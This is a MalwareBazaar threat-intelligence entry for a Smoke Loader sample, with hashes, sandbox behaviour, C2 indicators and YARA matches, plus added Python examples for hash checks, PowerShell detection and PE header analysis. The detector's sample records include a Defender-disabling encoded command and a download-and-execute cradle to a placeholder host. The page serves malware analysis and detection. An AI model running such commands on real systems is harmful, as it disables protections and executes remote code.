MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Smoke Loader
Vendor detections: 13

SHA256 hash: d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
SHA3-384 hash: 27b6d7640a965259d971ea6ea02e7f998203636ccf2b8b146f5e2fc68a0fb8861376b45f67fd21da9f98bef481b418e7
SHA1 hash: 67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74
MD5 hash: b2c17e4aaa1ab07e2be2c6e08120c7fe
humanhash: tennessee-shade-nitrogen-virginia
File name: wow.exe
Signature: Smoke Loader
File size: 15'479'739 bytes
First seen: 2025-01-27 07:18:34 UTC
Last seen: 2025-03-20 08:46:28 UTC
File type: Executable exe
MIME type: application/x-dosexec
imphash: a06f302f71edd380da3d5bf4a6d94ebd (shared with 5 x PythonStealer, 3 x XWorm, 3 x BlankGrabber)
ssdeep: 393216:gOWd863huc1dQJlAoF3MnG3WaiVLedWmoNr/xHWgrHz:5893hr1dQJ3MGGZKUpT
TLSH: T1ABF6339A7B680CDAE4DF2035C0D1E529E932FD911BA0DA1743E99D9B0D476C02D3EFA4
TrID:
  70.8% (.CPL) Windows Control Panel Item (generic) (57583/11/19)
  12.9% (.EXE) Win64 Executable (generic) (10522/11/4)
  6.2% (.EXE) Win16 NE executable (generic) (5038/12/1)
  2.5% (.ICL) Windows Icons Library (generic) (2059/9)
  2.4% (.EXE) OS/2 Executable (generic) (2029/13)
Magika: pebin
dhash icon: aebc385c4ce0e8f8 (shared with 10 x PythonStealer, 7 x RedLineStealer, 7 x DCRat)
Reporter: JAMESWT_WT
Tags: 107-174-231-211, 5-253-59-205, booking, exe, Smoke Loader, Spam-ITA
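Anyone who downloads this sample should confirm that the bytes on disk are the file this entry describes before analysing them. The Python below is an added example written for this page, not MalwareBazaar's or any vendor's code: it computes the four digests listed above in one pass, compares them with the entry, and implements the imphash algorithm (the pefile definition, which is what the imphash field shows) on imports written in the `MODULE.dll::Function` notation BLint uses further down. The hash constants are copied from this entry; ordinal-only imports are left out by stated assumption. One caveat the imphash line already hints at: the import table of a PyInstaller-built binary is the bootloader's, so sharing an imphash with PythonStealer, XWorm and BlankGrabber samples identifies the packer, not the payload.

```python
import hashlib
import re
import sys

# Hashes copied from the MalwareBazaar entry above (real IOCs for this sample).
ENTRY = {
    "sha256": "d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d",
    "sha1": "67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74",
    "md5": "b2c17e4aaa1ab07e2be2c6e08120c7fe",
    "sha3_384": "27b6d7640a965259d971ea6ea02e7f998203636ccf2b8b146f5e2fc68a0fb8861376b45f67fd21da9f98bef481b418e7",
}


def digest_all(data: bytes) -> dict:
    """Compute every digest the entry lists in a single pass over the bytes."""
    hashers = {
        "sha256": hashlib.sha256(),
        "sha1": hashlib.sha1(),
        "md5": hashlib.md5(),
        "sha3_384": hashlib.sha3_384(),
    }
    view = memoryview(data)
    chunk = 1 << 20  # 1 MiB pieces; the same loop handles the 15 MB sample unchanged
    for off in range(0, len(view), chunk):
        piece = view[off:off + chunk]
        for h in hashers.values():
            h.update(piece)
    return {name: h.hexdigest() for name, h in hashers.items()}


def match_entry(data: bytes, entry: dict = ENTRY) -> dict:
    """Which of the entry's hashes do these bytes match?

    All False: this is not the file the page describes (or it was re-packed).
    MD5/SHA1 True but SHA256 False: a collision against a broken hash; treat as hostile.
    """
    got = digest_all(data)
    return {algo: got[algo] == expected.lower() for algo, expected in entry.items()}


def imphash(imports: list) -> str:
    """imphash as defined by Mandiant and implemented by pefile (what MalwareBazaar shows).

    MD5 over 'module.function' pairs, lower-cased, in import-table order, comma-joined,
    with a trailing .dll/.ocx/.sys stripped from the module name. Imports are given in
    the 'MODULE.dll::Function' notation BLint uses on this page.
    Assumption: every import is by name; pefile's ordinal-to-name lookup for a few
    well-known DLLs is not reproduced here.
    """
    parts = []
    for imp in imports:
        module, func = imp.split("::", 1)
        module = re.sub(r"\.(dll|ocx|sys)$", "", module.lower())
        parts.append(f"{module}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


if __name__ == "__main__":
    # Usage: python verify_sample.py wow.exe
    with open(sys.argv[1], "rb") as fh:
        print(match_entry(fh.read()))
```

Run it against the downloaded archive's extracted file; anything other than four True values means the file is not the one catalogued here. The imphash function is useful for comparing your own import dump with the value above without installing pefile, but only the full import table in original order reproduces the entry's value.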

Intelligence

File Origin
# of uploads: 2
# of downloads: 454
Origin country: IT
Vendor Threat Intelligence

Result
Malware family:
ID: 1
File name: wow.exe
Verdict: Malicious activity
Analysis date: 2024-12-17 20:17:17 UTC
Tags: github, loader, python, metasploit, miner, xmrig, dcrat, upx, golang

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Result
Verdict: Malware
Maliciousness:
Behaviour:
Launching a process
Creating a file in the %temp% subdirectories
Launching a service
Creating a window
Restart of the analyzed sample
Creating a file
DNS request
Connection attempt
Sending a custom TCP request
Connecting to a non-recommended domain
Sending an HTTP GET request
Creating synchronization primitives
Creating a process from a recently created file
Creating a process with a hidden window
Using the Windows Management Instrumentation requests
Searching for the window
Searching for synchronization primitives
Launching the default Windows debugger (dwwin.exe)
Creating a file in the %AppData% directory
Connection attempt to an infection source
Unauthorized injection to a recently created process
Sending an HTTP GET request to an infection source

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: lolbin, microsoft_visual_cc, overlay, packed, packer_detected
Result
Verdict: UNKNOWN
Result
Threat name: Amadey, GhostRat, GuLoader, LummaC Steal
Detection: malicious
Classification: phis.troj.spyw.expl.evad.mine
Score: 100 / 100
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to detect virtual machines
Creates / moves files in alternative data streams (ADS)
Creates an undocumented autostart registry key
Creates HTML files with .exe extension (expired dropper behavior)
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after checking volume information)
Found malware configuration
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Opens the same file many times (likely Sandbox evasion)
PE file has a writeable .text section
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Schedule system process
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Amadey bot
Yara detected Generic Downloader
Yara detected GhostRat
Yara detected GuLoader
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
Yara detected XWorm
Behaviour
Behavior Graph ID 1600177 (sample wow.exe, start date 27/01/2025, architecture WINDOWS, score 100). The graph image did not survive extraction; its node text is rendered here as a process tree with the dropped files and network contacts it shows. Two dropped-file paths lost a path separator in extraction and are reproduced as extracted.

Start
  network: pastebin.com, urlhaus.abuse.ch, 22 other IPs or domains
  signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); Connects to a pastebin service (likely for C&C); 26 other signatures
  wow.exe
    dropped: C:\Users\...\_quoting_c.cp311-win_amd64.pyd (PE32+); C:\Users\user\AppData\...\win32evtlog.pyd (PE32+); C:\Users\user\AppData\Local\...\win32api.pyd (PE32+); 30 other files (28 malicious)
    signatures: Creates HTML files with .exe extension (expired dropper behavior); Found pyInstaller with non standard icon
    wow.exe (second instance)
      network: 5.252.155.72:80 (WORLDSTREAMNL, Russian Federation); 121.127.231.160:80 (SUNHK-DATA-AS-AP Sun Network Hong Kong Limited, Hong Kong); 53 other IPs or domains
      dropped: C:\Users\user\Downloads\haus\vapo.exe (PE32); C:\Users\user\Downloads\haus\traf.exe (PE32); C:\Users\user\Downloads\haus\sel1.exe (PE32); 10 other malicious files
      signatures: Found Tor onion address; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      sel1.exe
        signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking volume information); Contains functionality to detect virtual machines; 2 other signatures
        svchost.exe
          dropped: C:\Users\user\AppData\Roaming743A7.exe (PE32; path as extracted)
          signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Creates an undocumented autostart registry key; 5 other signatures
          WerFault.exe
      conhost.exe
        network: pastebin.com 104.20.4.235 (CLOUDFLARENET, United States)
        dropped: C:\ProgramData\Dllhost\winlogson.exe (PE32+); C:\ProgramData\Dllhost\WinRing0x64.sys (PE32+; WinRing0 is the MSR-access driver XMRig ships with, consistent with the Xmrig YARA hit above)
        signatures: Sample is not signed and drops a device driver
        cmd.exe
          signatures: Wscript starts Powershell (via cmd or directly); Encrypted powershell cmdline option found
          2 other processes
            signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
            WmiPrvSE.exe
        cmd.exe
          2 other processes
        cmd.exe
          conhost.exe
      amada2.exe
        dropped: C:\ProgramData\1be588a5b7\gdsun.exe (PE32)
        signatures: Creates / moves files in alternative data streams (ADS)
        gdsun.exe
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Opens the same file many times (likely Sandbox evasion)
          reg.exe
            signatures: Creates an undocumented autostart registry key
            conhost.exe
      10 other processes
        dropped: C:\Users\user\AppData\Roaming\vapo.exe (PE32)
        signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
        powershell.exe
          network: filedn.eu 45.131.244.47 (PCLOUDLU, Luxembourg)
          signatures: Found suspicious powershell code related to unpacking or dynamic code loading
          conhost.exe
        powershell.exe
          dropped: C:\ProgramData\1be588a5b7\T.exe (PE32)
          conhost.exe
        powershell.exe
          dropped: C:\ProgramData\1be588a5b7nalib.exe (PE32; path as extracted)
          conhost.exe
        7 other processes
          5 other processes
    conhost.exe
  vapo.exe
    signatures: Multi AV Scanner detection for dropped file
  OpenWith.exe
  GameBarPresenceWriter.exe
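Several signatures in this report describe one chain: WScript starts PowerShell, an encrypted (-EncodedCommand) command line is found, a Base64-encoded MpPreference cmdlet fires a Sigma rule, PowerShell downloads and executes, and schtasks.exe adds a task. The Python below is an added detection example written for this page, not Joe Sandbox's logic or the text of any Sigma rule: it decodes `-EncodedCommand` arguments (base64 of UTF-16LE, the same transformation the sandbox had to reverse), then checks the clear-text and decoded command together for Defender tampering, download cradles, hidden windows and scheduled-task creation, and flags a script host as the parent process. The three process-creation records and their `ParentImage|Image|CommandLine` layout are constructed for the example; the regexes are illustrative and will need tuning against real telemetry.

```python
import base64
import re
from typing import Optional

# The sandbox signatures above name the behaviours looked for here; the regexes and
# the record format are this example's own, not a vendor's rules.
ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)  # -e, -ec, -enc ... -EncodedCommand
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)

# Every pattern in a list must match somewhere in the text; order does not matter.
SUSPICIOUS = {
    "defender_tamper": [r"\b(Set|Add)-MpPreference\b", r"-(Disable\w+|Exclusion\w+)"],
    "download_cradle": [r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b",
                        r"\b(iex|Invoke-Expression|Start-Process)\b"],
    "schtasks_persistence": [r"\bschtasks(\.exe)?\b", r"/create\b"],
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # looked like -e<something> but is not a real encoded command


def analyze(record: str) -> dict:
    """record: 'ParentImage|Image|CommandLine' (constructed format for this example)."""
    parent, image, cmdline = record.split("|", 2)
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pats in SUSPICIOUS.items()
            if all(re.search(p, text, re.I) for p in pats)]
    if HIDDEN.search(cmdline):
        hits.append("hidden_window")
    if parent.lower().endswith(("wscript.exe", "cscript.exe")) and image.lower().endswith("powershell.exe"):
        hits.append("wscript_spawns_powershell")
    return {"image": image, "decoded": decoded, "hits": hits}


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation records, not events from the sandbox run on this page.
SAMPLE_RECORDS = [
    # benign: encoded but harmless, started from Explorer
    r"C:\Windows\explorer.exe|" + PS + "|powershell.exe -NoProfile -EncodedCommand "
    + encode_command("Get-Process | Sort-Object CPU"),
    # Defender tampering hidden behind -enc, spawned by a WScript dropper with a hidden window
    r"C:\Windows\System32\wscript.exe|" + PS + "|powershell -w hidden -enc "
    + encode_command("Set-MpPreference -DisableRealtimeMonitoring $true; "
                     "Add-MpPreference -ExclusionPath $env:ProgramData"),
    # clear-text download-and-execute cradle
    r"C:\Windows\System32\cmd.exe|" + PS
    + "|powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')\"",
]


def scan(records) -> list:
    """Return the analysis of every record that produced at least one hit."""
    return [r for r in (analyze(x) for x in records) if r["hits"]]


if __name__ == "__main__":
    for result in scan(SAMPLE_RECORDS):
        print(result["hits"], "<-", result["decoded"] or "(clear text)")
```

The point of decoding before matching is that a rule keyed on the literal string `Set-MpPreference` never sees it when the cmdlet is wrapped in `-enc`; the Sigma rule named in the report exists for exactly that reason. An encoded command on its own is not a verdict, which is why the first record produces no hits.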

Threat name: Win64.Trojan.Remcos
Status: Malicious
First seen: 2024-12-17 20:21:49 UTC
File Type: PE+ (Exe)
Extracted files: 1313
AV detection: 13 of 38 (34.21%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:asyncrat, family:xworm, botnet:heg, discovery, execution, persistence, pyinstaller, rat, trojan
Behaviour:
Checks processor information in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Checks computer location settings
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
AsyncRat
Asyncrat family
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction: nowmnew.loseyourip.com:6606

Verdict: Malicious
Tags: js_nemucod_m_gen, js_nemucod
YARA: n/a
Unpacked files
SHA256 hash: d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
MD5 hash: b2c17e4aaa1ab07e2be2c6e08120c7fe
SHA1 hash: 67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74
(These are the submitted file's own hashes; no distinct unpacked payload is listed here.)
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Borland
Author: malware-lu

Rule name: DebuggerCheck__API
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: DebuggerCheck__QueryInfo
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: DebuggerException__SetConsoleCtrl
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: golang_bin_JCorn_CSC846
Author: Justin Cornwell
Description: CSC-846 Golang detection ruleset

Rule name: malware_shellcode_hash
Author: JPCERT/CC Incident Response Group
Description: detect shellcode api hash value

Rule name: MD5_Constants
Author: phoul (@phoul)
Description: Look for MD5 constants

Rule name: pe_detect_tls_callbacks

Rule name: pe_no_import_table
Description: Detect pe file that no import table

Rule name: PyInstaller
Author: @bartblaze
Description: Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.

Rule name: Sus_Obf_Enc_Spoof_Hide_PE
Author: XiAnzheng
Description: Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)

Rule name: upxHook
Author: @r3dbU7z
Description: Detect artifacts from 'upxHook' - modification of UPX packer
Reference: https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/

Rule name: UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
Author: malware-lu

File information


The table below shows additional information about this malware sample such as delivery method and external references.

BLint


The following table provides more information about this file using BLint. BLint is a binary linter that checks the security properties and capabilities of executables.

Findings
ID                         Title                                                     Severity
CHECK_AUTHENTICODE         Missing Authenticode                                      high
CHECK_DLL_CHARACTERISTICS  Missing DLL security characteristics (FORCE_INTEGRITY)    high

Reviews
ID                  Capabilities                     Evidence
AUTH_API            Manipulates User Authorization   ADVAPI32.dll::ConvertSidToStringSidW
                                                     ADVAPI32.dll::ConvertStringSecurityDescriptorToSecurityDescriptorW
SECURITY_BASE_API   Uses Security Base API           ADVAPI32.dll::GetTokenInformation
WIN32_PROCESS_API   Can Create Process and Threads   KERNEL32.dll::CreateProcessW
                                                     ADVAPI32.dll::OpenProcessToken
                                                     KERNEL32.dll::CloseHandle
WIN_BASE_API        Uses Win Base API                KERNEL32.dll::TerminateProcess
                                                     KERNEL32.dll::LoadLibraryExW
                                                     KERNEL32.dll::GetDriveTypeW
                                                     KERNEL32.dll::GetStartupInfoW
                                                     KERNEL32.dll::GetCommandLineW
                                                     KERNEL32.dll::GetCommandLineA
WIN_BASE_EXEC_API   Can Execute other programs       KERNEL32.dll::WriteConsoleW
                                                     KERNEL32.dll::ReadConsoleW
                                                     KERNEL32.dll::SetConsoleCtrlHandler
                                                     KERNEL32.dll::SetStdHandle
                                                     KERNEL32.dll::GetConsoleWindow
                                                     KERNEL32.dll::GetConsoleMode
                                                     KERNEL32.dll::GetConsoleOutputCP
WIN_BASE_IO_API     Can Create Files                 KERNEL32.dll::CreateDirectoryW
                                                     KERNEL32.dll::CreateFileW
                                                     KERNEL32.dll::DeleteFileW
                                                     KERNEL32.dll::FindFirstFileW
                                                     KERNEL32.dll::RemoveDirectoryW
                                                     KERNEL32.dll::SetDllDirectoryW
WIN_USER_API        Performs GUI Actions             USER32.dll::PeekMessageW
                                                     USER32.dll::CreateWindowExW
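Both high-severity BLint findings can be reproduced straight from the PE headers, and doing so shows why they need a caveat. The Python below is an added example for this page, not BLint's code: it reads DllCharacteristics and the security data directory without pefile, reports which hardening bits (HIGH_ENTROPY_VA, DYNAMIC_BASE, FORCE_INTEGRITY, NX_COMPAT, GUARD_CF) are absent, and whether an Authenticode blob is attached at all. The `build_min_pe` helper constructs header-only images so the parser can be exercised offline; the sample's actual DllCharacteristics value is not on this page, so the values used are assumptions. Two caveats: FORCE_INTEGRITY is only set by the /INTEGRITYCHECK linker flag and is rare on ordinary user-mode executables, so its absence says little on its own; and a populated security directory only means a signature is attached, verifying it against the image hash needs signtool or Get-AuthenticodeSignature. Missing Authenticode is the norm for PyInstaller builds such as this one, and the capability "reviews" above (console APIs filed under "Can Execute other programs", for instance) are an import inventory, not a verdict.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x4000: "GUARD_CF",
}
EXPECTED = frozenset(DLL_CHARACTERISTICS.values())
SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset + size of the Authenticode blob


def pe_security_props(data: bytes) -> dict:
    """Read DllCharacteristics and the security directory straight from the headers."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (size_opt,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x20B:        # PE32+ (64-bit), what the sandboxes report for this sample
        pe32plus, num_rva_off, dd_base = True, 108, 112
    elif magic == 0x10B:      # PE32
        pe32plus, num_rva_off, dd_base = False, 92, 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if size_opt < dd_base + 8 * (SECURITY_DIR + 1):
        raise ValueError("optional header too short")
    (dllchar,) = struct.unpack_from("<H", data, opt + 70)  # same offset in PE32 and PE32+
    (num_dirs,) = struct.unpack_from("<I", data, opt + num_rva_off)
    sec_off = sec_size = 0
    if num_dirs > SECURITY_DIR:
        sec_off, sec_size = struct.unpack_from("<II", data, opt + dd_base + 8 * SECURITY_DIR)
    present = {name for bit, name in DLL_CHARACTERISTICS.items() if dllchar & bit}
    return {
        "format": "PE32+" if pe32plus else "PE32",
        "dll_characteristics": dllchar,
        "set": present,
        "missing": set(EXPECTED - present),
        "authenticode": sec_off != 0 and sec_size != 0,
    }


def build_min_pe(dllchar: int, pe32plus: bool = True, signed: bool = False) -> bytes:
    """Construct a header-only PE (no sections, cannot run) to exercise the parser offline."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dllchar)
    num_rva_off, dd_base = (108, 112) if pe32plus else (92, 96)
    struct.pack_into("<I", opt, num_rva_off, 16)
    if signed:  # pretend a 2 KiB WIN_CERTIFICATE blob sits at file offset 0x1200
        struct.pack_into("<II", opt, dd_base + 8 * SECURITY_DIR, 0x1200, 0x800)
    return dos + b"PE\0\0" + coff + bytes(opt)


def report(data: bytes) -> str:
    """Human-readable summary in the spirit of BLint's findings table."""
    p = pe_security_props(data)
    lines = ["%s, DllCharacteristics=0x%04x" % (p["format"], p["dll_characteristics"])]
    for name in sorted(EXPECTED):
        lines.append("  %-16s %s" % (name, "set" if name in p["set"] else "MISSING"))
    lines.append("  Authenticode     %s" % ("present" if p["authenticode"] else "MISSING"))
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    # Usage: python pe_hardening.py wow.exe
    with open(sys.argv[1], "rb") as fh:
        print(report(fh.read()))
```

A typical MSVC-linked 64-bit executable yields DYNAMIC_BASE, HIGH_ENTROPY_VA and NX_COMPAT set with FORCE_INTEGRITY clear, which is exactly the pattern BLint flags as high here; treat that finding as context for the packer and build chain, and let the sandbox behaviour above carry the verdict.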

Comments